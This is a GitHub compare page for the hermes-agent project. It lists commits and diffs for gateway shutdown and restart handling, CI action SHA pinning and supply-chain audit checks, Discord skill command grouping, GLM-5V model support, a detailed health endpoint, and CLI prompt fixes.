Compare commits

..

17 Commits

Author SHA1 Message Date
Shannon Sands bad9fe2452 add generic gateway startup readiness checks 2026-04-15 10:03:23 +10:00
Teknium 10494b42a1 feat(discord): register skills under /skill command group with category subcommands (#9909)
Instead of consuming one top-level slash command slot per skill (hitting the
100-command limit with ~26 built-ins + 74 skills), skills are now organized
under a single /skill group command with category-based subcommand groups:

  /skill creative ascii-art [args]
  /skill media gif-search [args]
  /skill mlops axolotl [args]

Discord supports 25 subcommand groups × 25 subcommands = 625 max skills,
well beyond the previous 74-slot ceiling.

Categories are derived from the skill directory structure:
- skills/creative/ascii-art/ → category 'creative'
- skills/mlops/training/axolotl/ → category 'mlops' (top-level parent)
- skills/dogfood/ → uncategorized (direct subcommand)

Changes:
- hermes_cli/commands.py: add discord_skill_commands_by_category() with
  category grouping, hub/disabled filtering, Discord limit enforcement
- gateway/platforms/discord.py: replace top-level skill registration with
  _register_skill_group() using app_commands.Group hierarchy
- tests: 7 new tests covering group creation, category grouping,
  uncategorized skills, hub exclusion, deep nesting, empty skills,
  and handler dispatch

Inspired by Discord community suggestion from bottium.
2026-04-14 16:27:02 -07:00
Teknium 039023f497 diag: log all hermes processes on unexpected gateway shutdown (#9905)
When the gateway receives SIGTERM/SIGINT, the shutdown handler now
runs 'ps aux' and logs every hermes/gateway-related process (excluding
itself). This will show in agent.log as:

  WARNING: Shutdown diagnostic — other hermes processes running:
    hermes  1234 ... hermes update --gateway
    hermes  5678 ... hermes gateway restart

This is the missing diagnostic for #5646 / #6666 — we can prove
the restarts are from systemctl but can't determine WHO issues the
systemctl command. Next time it happens, the agent.log will contain
the evidence (the process that sent the signal or called systemctl
should still be alive when the handler fires).
2026-04-14 16:26:36 -07:00
Teknium 6448e1da23 feat(zai): add GLM-5V-Turbo support for coding plan (#9907)
- Add glm-5v-turbo to OpenRouter, Nous, and native Z.AI model lists
- Add glm-5v context length entry (200K tokens) to model metadata
- Update Z.AI endpoint probe to try multiple candidate models per
  endpoint (glm-5.1, glm-5v-turbo, glm-4.7) — fixes detection for
  newer coding plan accounts that lack older models
- Add zai to _PROVIDER_VISION_MODELS so auxiliary vision tasks
  (vision_analyze, browser screenshots) route through 5v

Fixes #9888
2026-04-14 16:26:01 -07:00
Teknium 1e5e1e822b fix: ESC cancels secret/sudo prompts, clearer skip messaging (#9902)
- Add ESC key binding (eager) for secret_state and sudo_state modal
  prompts — fires immediately, same behavior as Ctrl+C cancel
- Update placeholder text: 'Enter to submit · ESC to skip' (was
  'Enter to skip' which was confusing — Enter on empty looked like
  submitting nothing rather than intentionally skipping)
- Update widget body text: 'ESC or Ctrl+C to skip'
- Change feedback message from 'Secret entry cancelled' to 'Secret
  entry skipped' — more accurate for the action taken
- getpass fallback prompt also updated for non-TUI mode
2026-04-14 16:11:37 -07:00
Teknium 55ce76b372 feat: add architecture-diagram skill (Cocoon AI port) (#9906)
Port of Cocoon AI's architecture-diagram-generator (MIT) as a Hermes skill.
Generates professional dark-themed system architecture diagrams as standalone
HTML/SVG files. Self-contained output, no dependencies.

- SKILL.md with design system specs, color palette, layout rules
- HTML template with all component types, arrow styles, legend examples
- Fits alongside excalidraw in creative/ category

Source: https://github.com/Cocoon-AI/architecture-diagram-generator
2026-04-14 16:10:18 -07:00
Teknium 1525624904 fix: block agent from self-destructing gateway via terminal (#6666)
Add dangerous command patterns that require approval when the agent
tries to run gateway lifecycle commands via the terminal tool:

- hermes gateway stop/restart — kills all running agents mid-work
- hermes update — pulls code and restarts the gateway
- systemctl restart/stop (with optional flags like --user)

These patterns fire the approval prompt so the user must explicitly
approve before the agent can kill its own gateway process. In YOLO
mode, the commands run without approval (by design — YOLO means the
user accepts all risks).

Also fixes the existing systemctl pattern to handle flags between
the command and action (e.g. 'systemctl --user restart' was previously
undetected because the regex expected the action immediately after
'systemctl').

Root cause: issue #6666 reported agents running 'hermes gateway
restart' via terminal, killing the gateway process mid-agent-loop.
The user sees the agent suddenly stop responding with no explanation.
Combined with the SIGTERM auto-recovery from PR #9875, the gateway
now both prevents accidental self-destruction AND recovers if it
happens anyway.

Test plan:
- Updated test_systemctl_restart_not_flagged → test_systemctl_restart_flagged
- All 119 approval tests pass
- E2E verified: hermes gateway restart, hermes update, systemctl
  --user restart all detected; hermes gateway status, systemctl
  status remain safe
2026-04-14 15:43:31 -07:00
Teknium 353b5bacbd test: add tests for /health/detailed endpoint and gateway health probe
- TestHealthDetailedEndpoint: 3 tests for the new API server endpoint
  (returns runtime data, handles missing status, no auth required)
- TestProbeGatewayHealth: 5 tests for _probe_gateway_health()
  (URL normalization, successful/failed probes, fallback chain)
- TestStatusRemoteGateway: 4 tests for /api/status remote fallback
  (remote probe triggers, skipped when local PID found, null PID handling)
2026-04-14 15:41:30 -07:00
Hermes Agent 139a5e37a4 docs(docker): add dashboard section, expose API port, update Compose example
- Running in gateway mode: expose port 8642 for the API server and
  health endpoint, with a note on when it's needed.
- New 'Running the dashboard' section: docker run command with
  GATEWAY_HEALTH_URL and env var reference table.
- Docker Compose example: updated to include both gateway and dashboard
  services with internal network connectivity (hermes-net), so the
  dashboard probes the gateway via http://hermes:8642.
- Concurrent access warning: clarified that running a read-only
  dashboard alongside the gateway is safe.
2026-04-14 15:41:30 -07:00
Hermes Agent 673acf22ae fix: override stale 'stopped' state when health probe confirms gateway alive
When the gateway responds to the health probe but the local
gateway_state.json has a stale 'stopped' state (common in cross-container
setups where the file was written before the gateway restarted), the
dashboard would show 'Running (remote)' but with a 'Stopped' badge.

Now if the HTTP probe succeeded (remote_health_body is not None) and
gateway_state is 'stopped' or None, override it to 'running'. Also
handles the no-shared-volume case where runtime is None entirely.
2026-04-14 15:41:30 -07:00
Hermes Agent 6ed682f111 fix: normalise GATEWAY_HEALTH_URL to base URL before probing
The probe was appending '/detailed' to whatever URL was provided,
so GATEWAY_HEALTH_URL=http://host:8642 would try /8642/detailed
and /8642 — neither of which are valid routes.

Now strips any trailing /health or /health/detailed from the env var
and always probes {base}/health/detailed then {base}/health.
Accepts bare base URL, /health, or /health/detailed forms.
2026-04-14 15:41:30 -07:00
Hermes Agent 45595f4805 feat(dashboard): add HTTP health probe for cross-container gateway detection
The dashboard's gateway status detection relied solely on local PID checks
(os.kill + /proc), which fails when the gateway runs in a separate container.

Changes:
- web_server.py: Add _probe_gateway_health() that queries the gateway's HTTP
  /health/detailed endpoint when the local PID check fails. Activated by
  setting the GATEWAY_HEALTH_URL env var (e.g. http://gateway:8642/health).
  Falls back to standard PID check when the env var is not set.
- api_server.py: Add GET /health/detailed endpoint that returns full gateway
  state (platforms, gateway_state, active_agents, pid, etc.) without auth.
  The existing GET /health remains unchanged for backwards compatibility.
- StatusPage.tsx: Handle the case where gateway_pid is null but the gateway
  is running remotely, displaying 'Running (remote)' instead of 'PID null'.

Environment variables:
- GATEWAY_HEALTH_URL: URL of the gateway health endpoint (e.g.
  http://gateway-container:8642/health). Unset = local PID check only.
- GATEWAY_HEALTH_TIMEOUT: Probe timeout in seconds (default: 3).
2026-04-14 15:41:30 -07:00
Teknium 397386cae2 fix: gateway auto-recovers from unexpected SIGTERM via systemd (#5646)
Root cause: when the gateway received SIGTERM (from hermes update,
external kill, WSL2 runtime, etc.), it exited with status 0. systemd's
Restart=on-failure only restarts on non-zero exit, so the gateway
stayed dead permanently. Users had to manually restart.

Fix 1: Signal-initiated shutdown exits non-zero
When SIGTERM/SIGINT is received and no restart was requested (via
/restart, /update, or SIGUSR1), start_gateway() returns False which
causes sys.exit(1). systemd sees a failure exit and auto-restarts
after RestartSec=30.

This is safe because systemctl stop tracks its own stop-requested
state independently of exit code — Restart= never fires for a
deliberate stop, regardless of exit code.

Also logs 'Received SIGTERM/SIGINT — initiating shutdown' so the
cause of unexpected shutdowns is visible in agent.log.

Fix 2: PID file ownership guard
remove_pid_file() now checks that the PID file belongs to the current
process before removing it. During --replace handoffs, the old
process's atexit handler could fire AFTER the new process wrote its
PID file, deleting the new record. This left the gateway running but
invisible to get_running_pid(), causing 'Another gateway already
running' errors on next restart.

Test plan:
- All restart drain tests pass (13)
- All gateway service tests pass (84)
- All update gateway restart tests pass (34)
2026-04-14 15:35:58 -07:00
Teknium eed891f1bb security: supply chain hardening — CI pinning, dep pinning, and code fixes (#9801)
CI/CD Hardening:
- Pin all 12 GitHub Actions to full commit SHAs (was mutable @vN tags)
- Add explicit permissions: {contents: read} to 4 workflows
- Pin CI pip installs to exact versions (pyyaml==6.0.2, httpx==0.28.1)
- Extend supply-chain-audit.yml to scan workflow, Dockerfile, dependency
  manifest, and Actions version changes

Dependency Pinning:
- Pin git-based Python deps to commit SHAs (atroposlib, tinker, yc-bench)
- Pin WhatsApp Baileys from mutable branch to commit SHA

Tool Registry:
- Reject tool name shadowing from different tool families (plugins/MCP
  cannot overwrite built-in tools). MCP-to-MCP overwrites still allowed.

MCP Security:
- Add tool description content scanning for prompt injection patterns
- Log detailed change diff on dynamic tool refresh at WARNING level

Skill Manager:
- Fix dangerous verdict bug: agent-created skills with dangerous
  findings were silently allowed (ask->None->allow). Now blocked.
2026-04-14 14:23:37 -07:00
Teknium 9bbf7659e9 chore: add Roy-oss1 to AUTHOR_MAP 2026-04-14 14:22:11 -07:00
Roy-oss1 1aa76620d4 fix(feishu): keep approval clicks synchronized with callback card state
Feishu approval clicks need the resolved card to come back from the
synchronous callback path itself. Leaving approval resolution to the
generic asynchronous card-action flow made button feedback depend on
later loop work instead of the callback response the client is waiting
for.

Change-Id: I574997cbbcaa097fdba759b47367e28d1b56b040
Constraint: Feishu card-action callbacks must acknowledge quickly and reflect final approval state from the callback response path
Rejected: Keep approval handling on the generic async card-action route | leaves card state synchronization vulnerable to callback timing and follow-up update ordering
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: Keep approval callback response construction separate from async queue unblocking unless Feishu callback semantics change
Tested: pytest tests/gateway/test_feishu.py tests/gateway/test_feishu_approval_buttons.py tests/gateway/test_approve_deny_commands.py tests/gateway/test_slack_approval_buttons.py tests/gateway/test_telegram_approval_buttons.py -q
Not-tested: Live Feishu workspace end-to-end callback rendering
2026-04-14 14:22:11 -07:00
Teknium fa8c448f7d fix: notify active sessions on gateway shutdown + update health check
Three fixes for gateway lifecycle stability:

1. Notify active sessions before shutdown (#new)
   When the gateway receives SIGTERM or /restart, it now sends a
   notification to every chat with an active agent BEFORE starting
   the drain. Users see:
   - Shutdown: 'Gateway shutting down — your task will be interrupted.'
   - Restart: 'Gateway restarting — use /retry after restart to continue.'
   Deduplicates per-chat so group sessions with multiple users get
   one notification. Best-effort: send failures are logged and swallowed.

2. Skip .clean_shutdown marker when drain timed out
   Previously, a graceful SIGTERM always wrote .clean_shutdown, even if
   agents were force-interrupted when the drain timed out. This meant
   the next startup skipped session suspension, leaving interrupted
   sessions in a broken state (trailing tool response, no final message).
   Now the marker is only written if the drain completed without timeout,
   so interrupted sessions get properly suspended on next startup.

3. Post-restart health check for hermes update (#6631)
   cmd_update() now verifies the gateway actually survived after
   systemctl restart (sleep 3s + is-active check). If the service
   crashed immediately, it retries once. If still dead, prints
   actionable diagnostics (journalctl command, manual restart hint).

Also closes #8104 — already fixed on main (the /restart handler
correctly detects systemd via INVOCATION_ID and uses via_service=True).

Test plan:
- 6 new tests for shutdown notifications (dedup, restart vs shutdown
  messaging, sentinel filtering, send failure resilience)
- Existing restart drain + update tests pass (47 total)
2026-04-14 14:21:57 -07:00
53 changed files with 2745 additions and 444 deletions
+4 -1
View File
@@ -9,11 +9,14 @@ on:
- '**/*.py'
- '.github/workflows/contributor-check.yml'
permissions:
contents: read
jobs:
check-attribution:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
with:
fetch-depth: 0 # Full history needed for git log
+6 -6
View File
@@ -28,20 +28,20 @@ jobs:
name: github-pages
url: ${{ steps.deploy.outputs.page_url }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/setup-node@v4
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
with:
node-version: 20
cache: npm
cache-dependency-path: website/package-lock.json
- uses: actions/setup-python@v5
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5
with:
python-version: '3.11'
- name: Install PyYAML for skill extraction
run: pip install pyyaml httpx
run: pip install pyyaml==6.0.2 httpx==0.28.1
- name: Extract skill metadata for dashboard
run: python3 website/scripts/extract-skills.py
@@ -73,10 +73,10 @@ jobs:
echo "hermes-agent.nousresearch.com" > _site/CNAME
- name: Upload artifact
uses: actions/upload-pages-artifact@v3
uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3
with:
path: _site
- name: Deploy to GitHub Pages
id: deploy
uses: actions/deploy-pages@v4
uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4
+7 -7
View File
@@ -23,21 +23,21 @@ jobs:
timeout-minutes: 60
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
with:
submodules: recursive
- name: Set up QEMU
uses: docker/setup-qemu-action@v3
uses: docker/setup-qemu-action@c7c53464625b32c7a7e944ae62b3e17d2b600130 # v3
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@v3
uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
# Build amd64 only so we can `load` the image for smoke testing.
# `load: true` cannot export a multi-arch manifest to the local daemon.
# The multi-arch build follows on push to main / release.
- name: Build image (amd64, smoke test)
uses: docker/build-push-action@v6
uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6
with:
context: .
file: Dockerfile
@@ -56,14 +56,14 @@ jobs:
- name: Log in to Docker Hub
if: github.event_name == 'push' && github.ref == 'refs/heads/main' || github.event_name == 'release'
uses: docker/login-action@v3
uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
- name: Push multi-arch image (main branch)
if: github.event_name == 'push' && github.ref == 'refs/heads/main'
uses: docker/build-push-action@v6
uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6
with:
context: .
file: Dockerfile
@@ -75,7 +75,7 @@ jobs:
- name: Push multi-arch image (release)
if: github.event_name == 'release'
uses: docker/build-push-action@v6
uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6
with:
context: .
file: Dockerfile
+6 -3
View File
@@ -7,13 +7,16 @@ on:
- '.github/workflows/docs-site-checks.yml'
workflow_dispatch:
permissions:
contents: read
jobs:
docs-site-checks:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/setup-node@v4
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
with:
node-version: 20
cache: npm
@@ -23,7 +26,7 @@ jobs:
run: npm ci
working-directory: website
- uses: actions/setup-python@v5
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5
with:
python-version: '3.11'
+4 -1
View File
@@ -14,6 +14,9 @@ on:
- 'run_agent.py'
- 'acp_adapter/**'
permissions:
contents: read
concurrency:
group: nix-${{ github.ref }}
cancel-in-progress: true
@@ -26,7 +29,7 @@ jobs:
runs-on: ${{ matrix.os }}
timeout-minutes: 30
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: DeterminateSystems/nix-installer-action@ef8a148080ab6020fd15196c2084a2eea5ff2d25 # v22
- uses: DeterminateSystems/magic-nix-cache-action@565684385bcd71bad329742eefe8d12f2e765b39 # v13
- name: Check flake
+11 -11
View File
@@ -20,14 +20,14 @@ jobs:
if: github.repository == 'NousResearch/hermes-agent'
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/setup-python@v5
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5
with:
python-version: '3.11'
- name: Install dependencies
run: pip install httpx pyyaml
run: pip install httpx==0.28.1 pyyaml==6.0.2
- name: Build skills index
env:
@@ -35,7 +35,7 @@ jobs:
run: python scripts/build_skills_index.py
- name: Upload index artifact
uses: actions/upload-artifact@v4
uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4
with:
name: skills-index
path: website/static/api/skills-index.json
@@ -53,25 +53,25 @@ jobs:
# Only deploy on schedule or manual trigger (not on every push to the script)
if: github.event_name == 'schedule' || github.event_name == 'workflow_dispatch'
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/download-artifact@v4
- uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
name: skills-index
path: website/static/api/
- uses: actions/setup-node@v4
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
with:
node-version: 20
cache: npm
cache-dependency-path: website/package-lock.json
- uses: actions/setup-python@v5
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5
with:
python-version: '3.11'
- name: Install PyYAML for skill extraction
run: pip install pyyaml
run: pip install pyyaml==6.0.2
- name: Extract skill metadata for dashboard
run: python3 website/scripts/extract-skills.py
@@ -92,10 +92,10 @@ jobs:
echo "hermes-agent.nousresearch.com" > _site/CNAME
- name: Upload artifact
uses: actions/upload-pages-artifact@v3
uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3
with:
path: _site
- name: Deploy to GitHub Pages
id: deploy
uses: actions/deploy-pages@v4
uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4
+57 -1
View File
@@ -14,7 +14,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
with:
fetch-depth: 0
@@ -149,6 +149,62 @@ jobs:
"
fi
# --- CI/CD workflow files modified ---
WORKFLOW_HITS=$(git diff --name-only "$BASE".."$HEAD" | grep -E '\.github/workflows/.*\.ya?ml$' || true)
if [ -n "$WORKFLOW_HITS" ]; then
FINDINGS="${FINDINGS}
### ⚠️ WARNING: CI/CD workflow files modified
Changes to workflow files can alter build pipelines, inject steps, or modify permissions. Verify no unauthorized actions or secrets access were added.
**Files:**
\`\`\`
${WORKFLOW_HITS}
\`\`\`
"
fi
# --- Dockerfile / container build files modified ---
DOCKER_HITS=$(git diff --name-only "$BASE".."$HEAD" | grep -iE '(Dockerfile|\.dockerignore|docker-compose)' || true)
if [ -n "$DOCKER_HITS" ]; then
FINDINGS="${FINDINGS}
### ⚠️ WARNING: Container build files modified
Changes to Dockerfiles or compose files can alter base images, add build steps, or expose ports. Verify base image pins and build commands.
**Files:**
\`\`\`
${DOCKER_HITS}
\`\`\`
"
fi
# --- Dependency manifest files modified ---
DEP_HITS=$(git diff --name-only "$BASE".."$HEAD" | grep -E '(pyproject\.toml|requirements.*\.txt|package\.json|Gemfile|go\.mod|Cargo\.toml)$' || true)
if [ -n "$DEP_HITS" ]; then
FINDINGS="${FINDINGS}
### ⚠️ WARNING: Dependency manifest files modified
Changes to dependency files can introduce new packages or change version pins. Verify all dependency changes are intentional and from trusted sources.
**Files:**
\`\`\`
${DEP_HITS}
\`\`\`
"
fi
# --- GitHub Actions version unpinning (mutable tags instead of SHAs) ---
ACTIONS_UNPIN=$(echo "$DIFF" | grep -n '^\+' | grep 'uses:' | grep -v '#' | grep -E '@v[0-9]' | head -10 || true)
if [ -n "$ACTIONS_UNPIN" ]; then
FINDINGS="${FINDINGS}
### ⚠️ WARNING: GitHub Actions with mutable version tags
Actions should be pinned to full commit SHAs (not \`@v4\`, \`@v5\`). Mutable tags can be retargeted silently if a maintainer account is compromised.
**Matches:**
\`\`\`
${ACTIONS_UNPIN}
\`\`\`
"
fi
# --- Output results ---
if [ -n "$FINDINGS" ]; then
echo "found=true" >> "$GITHUB_OUTPUT"
+7 -4
View File
@@ -6,6 +6,9 @@ on:
pull_request:
branches: [main]
permissions:
contents: read
# Cancel in-progress runs for the same PR/branch
concurrency:
group: tests-${{ github.ref }}
@@ -17,13 +20,13 @@ jobs:
timeout-minutes: 10
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- name: Install system dependencies
run: sudo apt-get update && sudo apt-get install -y ripgrep
- name: Install uv
uses: astral-sh/setup-uv@v5
uses: astral-sh/setup-uv@d4b2f3b6ecc6e67c4457f6d3e41ec42d3d0fcb86 # v5
- name: Set up Python 3.11
run: uv python install 3.11
@@ -49,10 +52,10 @@ jobs:
timeout-minutes: 10
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- name: Install uv
uses: astral-sh/setup-uv@v5
uses: astral-sh/setup-uv@d4b2f3b6ecc6e67c4457f6d3e41ec42d3d0fcb86 # v5
- name: Set up Python 3.11
run: uv python install 3.11
+1
View File
@@ -112,6 +112,7 @@ _API_KEY_PROVIDER_AUX_MODELS: Dict[str, str] = {
# "exotic provider" branch checks this before falling back to the main model.
_PROVIDER_VISION_MODELS: Dict[str, str] = {
"xiaomi": "mimo-v2-omni",
"zai": "glm-5v-turbo",
}
# OpenRouter app attribution headers
+6 -17
View File
@@ -28,7 +28,6 @@ from agent.model_metadata import (
get_model_context_length,
estimate_messages_tokens_rough,
)
from agent.redact import redact_sensitive_text
logger = logging.getLogger(__name__)
@@ -271,15 +270,11 @@ class ContextCompressor(ContextEngine):
Includes tool call arguments and result content (up to
``_CONTENT_MAX`` chars per message) so the summarizer can preserve
specific details like file paths, commands, and outputs.
All content is redacted before serialization to prevent secrets
(API keys, tokens, passwords) from leaking into the summary that
gets sent to the auxiliary model and persisted across compactions.
"""
parts = []
for msg in turns:
role = msg.get("role", "unknown")
content = redact_sensitive_text(msg.get("content") or "")
content = msg.get("content") or ""
# Tool results: keep enough content for the summarizer
if role == "tool":
@@ -300,7 +295,7 @@ class ContextCompressor(ContextEngine):
if isinstance(tc, dict):
fn = tc.get("function", {})
name = fn.get("name", "?")
args = redact_sensitive_text(fn.get("arguments", ""))
args = fn.get("arguments", "")
# Truncate long arguments but keep enough for context
if len(args) > self._TOOL_ARGS_MAX:
args = args[:self._TOOL_ARGS_HEAD] + "..."
@@ -358,11 +353,7 @@ class ContextCompressor(ContextEngine):
"assistant that continues the conversation. "
"Do NOT respond to any questions or requests in the conversation — "
"only output the structured summary. "
"Do NOT include any preamble, greeting, or prefix. "
"NEVER include API keys, tokens, passwords, secrets, credentials, "
"or connection strings in the summary — replace any that appear "
"with [REDACTED]. Note that the user had credentials present, but "
"do not preserve their values."
"Do NOT include any preamble, greeting, or prefix."
)
# Shared structured template (used by both paths).
@@ -403,7 +394,7 @@ class ContextCompressor(ContextEngine):
[What remains to be done — framed as context, not instructions]
## Critical Context
[Any specific values, error messages, configuration details, or data that would be lost without explicit preservation. NEVER include API keys, tokens, passwords, or credentials — write [REDACTED] instead.]
[Any specific values, error messages, configuration details, or data that would be lost without explicit preservation]
## Tools & Patterns
[Which tools were used, how they were used effectively, and any tool-specific discoveries]
@@ -446,7 +437,7 @@ Use this exact structure:
prompt += f"""
FOCUS TOPIC: "{focus_topic}"
The user has requested that this compaction PRIORITISE preserving all information related to the focus topic above. For content related to "{focus_topic}", include full detail — exact values, file paths, command outputs, error messages, and decisions. For content NOT related to the focus topic, summarise more aggressively (brief one-liners or omit if truly irrelevant). The focus topic sections should receive roughly 60-70% of the summary token budget. Even for the focus topic, NEVER preserve API keys, tokens, passwords, or credentials — use [REDACTED]."""
The user has requested that this compaction PRIORITISE preserving all information related to the focus topic above. For content related to "{focus_topic}", include full detail — exact values, file paths, command outputs, error messages, and decisions. For content NOT related to the focus topic, summarise more aggressively (brief one-liners or omit if truly irrelevant). The focus topic sections should receive roughly 60-70% of the summary token budget."""
try:
call_kwargs = {
@@ -469,9 +460,7 @@ The user has requested that this compaction PRIORITISE preserving all informatio
# Handle cases where content is not a string (e.g., dict from llama.cpp)
if not isinstance(content, str):
content = str(content) if content else ""
# Redact the summary output as well — the summarizer LLM may
# ignore prompt instructions and echo back secrets verbatim.
summary = redact_sensitive_text(content.strip())
summary = content.strip()
# Store for iterative updates on next compaction
self._previous_summary = summary
self._summary_failure_cooldown_until = 0.0
+21 -3
View File
@@ -8631,6 +8631,24 @@ class HermesCLI:
self._should_exit = True
event.app.exit()
_modal_prompt_active = Condition(
lambda: bool(self._secret_state or self._sudo_state)
)
@kb.add('escape', filter=_modal_prompt_active, eager=True)
def handle_escape_modal(event):
"""ESC cancels active secret/sudo prompts."""
if self._secret_state:
self._cancel_secret_capture()
event.app.current_buffer.reset()
event.app.invalidate()
return
if self._sudo_state:
self._sudo_state["response_queue"].put("")
self._sudo_state = None
event.app.invalidate()
return
@kb.add('c-z')
def handle_ctrl_z(event):
"""Handle Ctrl+Z - suspend process to background (Unix only)."""
@@ -8928,9 +8946,9 @@ class HermesCLI:
if cli_ref._voice_processing:
return "transcribing..."
if cli_ref._sudo_state:
return "type password (hidden), Enter to skip"
return "type password (hidden), Enter to submit · ESC to skip"
if cli_ref._secret_state:
return "type secret (hidden), Enter to skip"
return "type secret (hidden), Enter to submit · ESC to skip"
if cli_ref._approval_state:
return ""
if cli_ref._clarify_freetext:
@@ -9173,7 +9191,7 @@ class HermesCLI:
prompt = state.get("prompt") or f"Enter value for {state.get('var_name', 'secret')}"
metadata = state.get("metadata") or {}
help_text = metadata.get("help")
body = 'Enter secret below (hidden), or press Enter to skip'
body = 'Enter secret below (hidden), ESC or Ctrl+C to skip'
content_lines = [prompt, body]
if help_text:
content_lines.insert(1, str(help_text))
+25 -1
View File
@@ -3,11 +3,12 @@ Event Hook System
A lightweight event-driven system that fires handlers at key lifecycle points.
Hooks are discovered from ~/.hermes/hooks/ directories, each containing:
- HOOK.yaml (metadata: name, description, events list)
- HOOK.yaml (metadata: name, description, events list, optional startup_readiness)
- handler.py (Python handler with async def handle(event_type, context))
Events:
- gateway:startup -- Gateway process starts
- gateway:shutdown -- Gateway process is shutting down
- session:start -- New session created (first message of a new session)
- session:end -- Session ends (user ran /new or /reset)
- session:reset -- Session reset completed (new session entry created)
@@ -31,6 +32,26 @@ from hermes_cli.config import get_hermes_home
HOOKS_DIR = get_hermes_home() / "hooks"
def _normalize_startup_readiness(hook_name: str, manifest: dict[str, Any]) -> Optional[dict[str, Any]]:
"""Validate and normalize optional startup readiness metadata."""
readiness = manifest.get("startup_readiness")
if readiness is None:
return None
if not isinstance(readiness, dict):
print(f"[hooks] Ignoring startup_readiness for {hook_name}: expected mapping", flush=True)
return None
check_id = str(readiness.get("id", "")).strip()
if not check_id:
print(f"[hooks] Ignoring startup_readiness for {hook_name}: missing id", flush=True)
return None
return {
"id": check_id,
"required": bool(readiness.get("required", True)),
}
class HookRegistry:
"""
Discovers, loads, and fires event hooks.
@@ -62,6 +83,7 @@ class HookRegistry:
"description": "Run ~/.hermes/BOOT.md on gateway startup",
"events": ["gateway:startup"],
"path": "(builtin)",
"startup_readiness": None,
})
except Exception as e:
print(f"[hooks] Could not load built-in boot-md hook: {e}", flush=True)
@@ -102,6 +124,7 @@ class HookRegistry:
if not events:
print(f"[hooks] Skipping {hook_name}: no events declared", flush=True)
continue
startup_readiness = _normalize_startup_readiness(hook_name, manifest)
# Dynamically load the handler module
spec = importlib.util.spec_from_file_location(
@@ -128,6 +151,7 @@ class HookRegistry:
"description": manifest.get("description", ""),
"events": events,
"path": str(hook_dir),
"startup_readiness": startup_readiness,
})
print(f"[hooks] Loaded hook '{hook_name}' for events: {events}", flush=True)
+23
View File
@@ -10,6 +10,7 @@ Exposes an HTTP server with endpoints:
- POST /v1/runs — start a run, returns run_id immediately (202)
- GET /v1/runs/{run_id}/events — SSE stream of structured lifecycle events
- GET /health — health check
- GET /health/detailed — rich status for cross-container dashboard probing
Any OpenAI-compatible frontend (Open WebUI, LobeChat, LibreChat,
AnythingLLM, NextChat, ChatBox, etc.) can connect to hermes-agent
@@ -565,6 +566,27 @@ class APIServerAdapter(BasePlatformAdapter):
"""GET /health — simple health check."""
return web.json_response({"status": "ok", "platform": "hermes-agent"})
async def _handle_health_detailed(self, request: "web.Request") -> "web.Response":
"""GET /health/detailed — rich status for cross-container dashboard probing.
Returns gateway state, connected platforms, PID, and uptime so the
dashboard can display full status without needing a shared PID file or
/proc access. No authentication required.
"""
from gateway.status import read_runtime_status
runtime = read_runtime_status() or {}
return web.json_response({
"status": "ok",
"platform": "hermes-agent",
"gateway_state": runtime.get("gateway_state"),
"platforms": runtime.get("platforms", {}),
"active_agents": runtime.get("active_agents", 0),
"exit_reason": runtime.get("exit_reason"),
"updated_at": runtime.get("updated_at"),
"pid": os.getpid(),
})
async def _handle_models(self, request: "web.Request") -> "web.Response":
"""GET /v1/models — return hermes-agent as an available model."""
auth_err = self._check_auth(request)
@@ -1783,6 +1805,7 @@ class APIServerAdapter(BasePlatformAdapter):
self._app = web.Application(middlewares=mws)
self._app["api_server_adapter"] = self
self._app.router.add_get("/health", self._handle_health)
self._app.router.add_get("/health/detailed", self._handle_health_detailed)
self._app.router.add_get("/v1/health", self._handle_health)
self._app.router.add_get("/v1/models", self._handle_models)
